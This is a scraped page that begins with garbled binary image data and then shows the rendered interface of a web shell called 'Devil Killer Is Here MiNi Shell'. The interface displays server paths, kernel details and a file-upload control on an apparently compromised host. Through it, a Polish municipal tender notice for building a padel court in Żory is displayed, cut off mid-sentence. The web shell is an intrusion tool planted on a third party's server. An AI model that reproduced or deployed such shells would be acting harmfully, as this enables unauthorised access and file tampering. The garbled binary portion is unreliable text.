JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210526/0006531001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00065310 z dnia 2021-05-26</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa kortu do gry w padel przy ul. Folwareckiej w Żorach. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIEJSKA ŻORY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276255542</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Wojska Polskiego 25</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żory</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 4348245</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@um.zory.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.zory.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa kortu do gry w padel przy ul. Folwareckiej w Żorach. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b076fb60-be0a-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00065310</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001774/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.23 Budowa kortu do gry w padel</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zory.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zory.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzieleniu zamówienia komunikacja między Zamawiającym a Wykonawcami<br/>odbywasię przy użyciu Platformy do elektronicznej obsługi zamówień. Ofertę, oświadczenie, o<br/>którychmowawart. 125 ust. 1 ustawy Pzp należy złożyć pod rygorem nieważności w formie<br/>elektronicznej lubwpostaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Szczegółydotyczącekomunikacji zostały opisane SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i<br/>2rozporządzeniaParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawieochrony osóbfizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnegoprzepływu takichdanych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochroniedanych) (Dz. Urz. UE L119 z04.05.2016, str. 1), dalej „RODO”, informuję, że: -<br/>administratoremPani/Pana danychosobowychprzetwarzanych w Urzędzie Miasta Żory jest Prezydent<br/>Miasta Żory, Al.Wojska Polskiego25, 44-240Żory, tel. 32 4348200, email: umzory@um.zory.pl -<br/>inspektorem ochronydanych osobowychwUrzędzie Miasta Żory jest Pani Sylwia Chrapek, kontakt: tel.<br/>32 4348133, email:iod@um.zory.pl;-Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6<br/>ust. 1 lit. c RODO wceluzwiązanymz postępowaniem o udzielenie zamówienia publicznego pn. budowa kortu do gry w padel przy ul. Folwareckiej w Żorach prowadzonym w trybie podstawowym- odbiorcami Pani/Pana danych osobowych<br/>będąosoby lubpodmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art.<br/>18oraz art.74ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r.<br/>poz.2019 zezm.),dalej „ustawa Pzp”, osoby lub podmioty, którym na podstawie odrębnych<br/>przepisówprawaprzysługujeprawo kontroli, jak również osoby lub podmioty którym dane, zostaną<br/>udostępnionewoparciu oprzepisy ustawy z dnia 6 września 2001 r. o dostępie do<br/>informacjipublicznej(Dz.U.2016.1764 zpóźn.zm);- Pani/Pana dane osobowe będą przechowywane,<br/>zgodnie z art.78 ust. 1ustawy Pzp, przezokres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia,Zgodnie zRozporządzeniemPrezesa Rady Ministrów z dnia 18 stycznia 2011 r. w<br/>sprawieinstrukcjikancelaryjnej, jednolitychrzeczowych wykazów akt oraz instrukcji w sprawie<br/>organizacji izakresudziałania archiwówzakładowych (Dz.U.2011.14.67 z dnia 2011.01.20) teczki<br/>aktowebędąprzechowywane w archiwumzakładowym przez okres 5 lat w przypadku<br/>dokumentacjizamówieńpublicznych;- obowiązek podaniaprzez Panią/Pana danych osobowych<br/>bezpośrednioPani/Panadotyczących jest wymogiemustawowym określonym w przepisach ustawy Pzp,<br/>związanym zudziałemw postępowaniu o udzieleniezamówienia publicznego; konsekwencje niepodania<br/>określonychdanychwynikają z ustawy Pzp; - wodniesieniu do Pani/Pana danych osobowych decyzje<br/>niebędąpodejmowane w sposóbzautomatyzowany, stosowanie do art. 22 RODO;- posiada Pani/Pan:<br/>−napodstawie art. 15 RODOprawo dostępu do danych osobowych Pani/Pana dotyczących;−<br/>napodstawieart. 16 RODO prawo dosprostowania Pani/Pana danych osobowych *;− na podstawie art.<br/>18RODOprawo żądania odadministratora ograniczenia przetwarzania danych osobowych<br/>zzastrzeżeniemprzypadków, o którychmowa w art. 18 ust. 2 RODO **; − prawo do wniesienia skargi<br/>doPrezesaUrzędu Ochrony DanychOsobowych, gdy uzna Pani/Pan, że przetwarzanie<br/>danychosobowychPani/Pana dotyczących naruszaprzepisy RODO;- nie przysługuje Pani/Panu:− w<br/>związku zart. 17 ust.3 lit. b, d lub e RODO prawo dousunięcia danych osobowych;− prawo do<br/>przenoszeniadanychosobowych, o którym mowa w art. 20RODO;− na podstawie art. 21 RODO prawo<br/>sprzeciwu,wobecprzetwarzania danych osobowych, gdyżpodstawą prawną przetwarzania<br/>Pani/Panadanychosobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.4.14.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa kortu do gry w padel o powierzchni użytkowej 200,00m2:<br/>a)	wykonanie fundamentu żelbetowego o wymiarach 40x40cm i długości całkowitej 60,0mb po obwodzie boiska,<br/>b)	wykonanie podbudowy boiska z kruszywa łamanego stabilizowanego mechanicznie wraz z górną płytą betonową gr. 15cm z betonu klasy C20/25 zbrojoną przeciwskurczowo siatką,<br/>c)	montaż konstrukcji stalowej ogrodzenia kortu wraz z montażem wypełnienia ścian zewnętrznych kortu ze szkła hartowanego i ścian bocznych z siatki zgrzewanej,<br/>d)	wykonanie nawierzchni sportowej kortu ze sztucznej trawy koloru niebieskiego z naniesionymi białymi liniami oznaczającymi pola gry, nawierzchnia ze sztucznej trawy utwardzona piaskiem kwarcowym,<br/>e)	montaż elementów małej architektury: ławki z oparciem (4szt.) długości 2,0m, kosze na śmieci z przekryciem (2szt.); elementy małej architektury montowane w sposób trwały do podłoża poprzez fundamenty betonowe,<br/>f)	wyposażenie kortu w sprzęt sportowy: siatka dzieląca pola gry wraz z dwoma słupkami o przekroju okrągłym lub kwadratowym z zaokrąglonymi końcami (słupki mocowane do płyty betonowej podłoża kotwami), rakiety do padla (2szt.) wraz z pokrowcami ochronnymi, piłki do padla (3szt.) <br/>g)	wykonanie utwardzonego dojścia z kostki brukowej typ „starobruk” (nostalit) kolor szary, kostka gr. 6cm ułożona na podbudowie z kruszywa łamanego stabilizowanego mechanicznie ograniczona na krawędziach obrzeżem betonowym 8x30cm, <br/>h)	roboty elektryczne: <br/>	wykonanie oświetlenia treningowego (200 lx) boiska poprzez montaż 8 projektorów ledowych na czterech słupach obudowy kortu – wysokość montażu projektorów 6 m,<br/>	wykonanie zasilania oświetlenia boiska kablem YKY 3x4 mm2 z istniejącego złącza kablowego i rozdzielni lodowiska (zabudować bezpiecznik dla obwodu oświetlenia)<br/> wymagana osobna szafka z zabezpieczeniami, zegarem astronomicznym sterującym i możliwością włączenia oświetlenia ręcznie,<br/>i)	pełna obsługa geodezyjna (wytyczenie inwestycji w terenie, pomiar geodezyjny powykonawczy).<br/>Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji projektowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45212221-1 - Roboty budowlane związane z obiektami na terenach sportowych</p> <p class="mb-0">45236110-4 - Wyrównywanie nawierzchni boisk sportowych</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">56 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty w<br/>oparciu o następujące kryterium: Cena - 60 punktów, okres gwarancji na roboty budowlane- 40 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa: Zamawiający uzna warunek za spełniony<br/>jeżeli: 1)	Wykonawca w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał 1 zamówienie polegające na wykonaniu nawierzchni sportowej ze sztucznej trawy o powierzchni min. 150 m2 oraz załączy dowody określające czy te roboty budowlane zostały wykonane należycie, w szczególności informacje o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. <br/>2)	Wykonawca skieruje osoby, do realizacji zamówienia w szczególności odpowiedzialne za: <br/>a)	kierowanie robotami budowlanymi w specjalności konstrukcyjno-budowlanej (uprawnienia w zakresie kierowania, nadzorowania i kontrolowania budowy),<br/>b)	kierowanie robotami budowlanymi w specjalności sieci i instalacji elektrycznych (uprawnienia w zakresie kierowania, nadzorowania i kontrolowania budowy),<br/>wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami: <br/><br/>Zamawiający dopuszcza łączenie funkcji kierowników budowy pod warunkiem posiadania przez tę osobę odpowiednich uprawnień.<br/><br/>W przypadku osób posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się aby osoby te spełniały odpowiednie warunki opisane w art. 12a ustawy Prawo budowlane. Zamawiający uzna uprawnienia zdobyte na podstawie przepisów obowiązujących przed dniem wejścia w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy – w oparciu o art. 104 ustawy z dnia 7 lipca 1994r. – Prawo budowlane (t.j. Dz.U.2019.1186 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień składania, chyba że zamawiający jest w posiadaniu lub ma dostęp do tych podmiotowych środków dowodowych:<br/>1)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>2)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wypełniony formularz ofertowy musi zawierać następujące załączniki: a. Oświadczenie, októrym mowa w art. 125 ust. 1 ustawy pzp o niepodleganiu wykluczeniu i spełnianiu warunków udziału w<br/>postępowaniu, w zakresie wskazanym przez zamawiającego (zgodnie z zał. nr 1dooferty)b.<br/>Oświadczenie w związku z art. 117 ust. 4 ustawy pzp, z którego wynika, które roboty budowlane<br/>wykonają poszczególni wykonawcy w przypadku wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia - jeżeli dotyczy (zgodnie z zał. nr 2 do oferty)c. oświadczenie Wykonawcy<br/>dotyczące obowiązku podatkowego (zgodnie z zał. nr 3 do oferty),d. zobowiązanie podmiotu<br/>trzeciego do oddania Wykonawcy do dyspozycji niezbędnych zasobówna potrzeby wykonania<br/>zamówienia lub inny dokument potwierdzający ten fakt - jeżeli dotyczy, e. pełnomocnictwo - jeśli<br/>dotyczy, f. wadium jeżeli wykonawca wnosi wadium w innej formie niż pieniężna <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 2.500 zł (słownie: dwa tysiące pięćset złotych 00/100). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego.W takim<br/>przypadku Wykonawcy występujący wspólnie są zobowiązanidoustanowieniapełnomocnika<br/>doreprezentowania ich w postępowaniu albo do reprezentowaniaich wpostępowaniu i<br/>zawarciaumowy w sprawie przedmiotowego zamówieniapublicznego.Wszelkakorespondencja<br/>będzieprowadzona przez Zamawiającego wyłącznie zpełnomocnikiem. W odniesieniu do<br/>warunków dotyczących wykształcenia, kwalifikacjizawodowych lub doświadczenia Wykonawcy<br/>wspólnie ubiegający sięo udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>Wykonawców, którzywykonająrobotybudowlane, do realizacji których tezdolności sąwymagane.<br/>Wykonawcywspólnieubiegający sięo udzielenie zamówieniadołączają odpowiedniodo oferty<br/>oświadczenie, zktóregowynika, któreroboty budowlanewykonają poszczególniWykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w sposób przewidziany przepisami art. 455 ustawy pzp oraz w przypadkach:<br/>1	Przyczyna/okoliczności:	Wystąpienie siły wyższej uniemożliwiającej zrealizowanie zamówienia w terminie umownym	Skutek – zmiana w umowie/aneks: Zmiana terminu realizacji zamówienia o tyle dni ile trwało usuwanie skutków siły wyższej i/lub ustąpienie siły wyższej<br/>2	Przyczyna/okoliczności:	Wystąpienie kolizji z równolegle prowadzonymi przez inne podmioty inwestycjami, Skutek – zmiana w umowie/aneks: Zmiana terminu realizacji zamówienia o tyle dnia ile trwało wstrzymanie robót związane z kolizją z równolegle prowadzonymi przez inne podmioty inwestycjami<br/>3	Przyczyna/okoliczności:	Konieczność wykonania robót dodatkowych niezbędnych do prawidłowego wykonania zamówienia podstawowego których wykonanie stało się konieczne na skutek sytuacji niemożliwych do przewidzenia a które maja wpływ na termin realizacji zamówienia, Skutek – zmiana w umowie/aneks: Zmiana terminu realizacji zamówienia o tyle dni ile trwało wykonanie robót dodatkowych<br/>4	Przyczyna/okoliczności:	Znalezienie niewybuchów lub znalezisk archeologicznych Skutek – zmiana w umowie/aneks: Zmiana terminu realizacji zamówienia o tyle dni ile trwało wstrzymanie robót związane z usunięciem niewybuchów lub prowadzeniem badań archeologicznych<br/>5	Przyczyna/okoliczności:	Wstrzymanie prac budowlanych przez właściwy organ z przyczyn 